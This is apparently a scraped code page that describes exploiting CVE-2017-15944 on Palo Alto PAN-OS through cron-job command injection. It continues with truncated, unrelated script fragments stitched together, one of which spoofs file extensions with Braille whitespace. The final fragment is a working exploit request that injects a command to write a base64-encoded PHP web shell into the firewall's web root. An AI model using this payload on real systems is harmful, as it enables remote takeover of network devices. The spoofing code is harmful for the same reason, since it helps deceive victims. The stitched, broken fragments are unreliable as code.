Keith Lee milo2012

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques of exploiting CVE-2017-15944 exploit, is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

	import argparse
	import os
	import urllib.parse

	# Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability

	# Define the encoded Braille whitespace character sequence
	BRAILLE_WHITESPACE = "%E2%A0%80" * 26

	def create_spoofed_file(input_file, output_base, fake_extension):

	import requests
	import argparse
	import re
	from concurrent.futures import ThreadPoolExecutor, as_completed
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()


	def check_usernames(file_path, base_url, num_threads):

	function Get-CustomActionsFromMSI {
	param (
	[string]$msiPath
	)

	try {
	# Load the Windows Installer COM object
	$installer = New-Object -ComObject WindowsInstaller.Installer

	# Open the MSI database in read-only mode

	import argparse
	import requests
	import re

	def main():
	# Parse command line arguments
	parser = argparse.ArgumentParser(description='Dump data from a specific measurement/table in an InfluxDB instance via HTTP API.')
	parser.add_argument('-u', '--url', type=str, required=True, help='URL of the InfluxDB query endpoint')
	parser.add_argument('-d', '--database', type=str, help='Name of the database')
	parser.add_argument('-t', '--table', type=str, help='Name of the measurement/table')

	package main
	import (
	//"flag"
	"log"
	"fmt"
	"strings"
	"time"
	"github.com/stephen-fox/user32util"
	)
	var timeout time.Duration = 1

	import optparse
	import requests
	import xml.etree.ElementTree as ET
	import xmltodict
	import base64

	def fixed_xml_body_as_string(filename):
	text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
	text+=' <soapenv:Header/>'
	text+=' <soapenv:Body>'

	#!/usr/bin/env python
	# encoding: utf-8
	import requests
	import sys
	import base64
	requests.packages.urllib3.disable_warnings()
	session = requests.Session()
	def step3_exp():
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post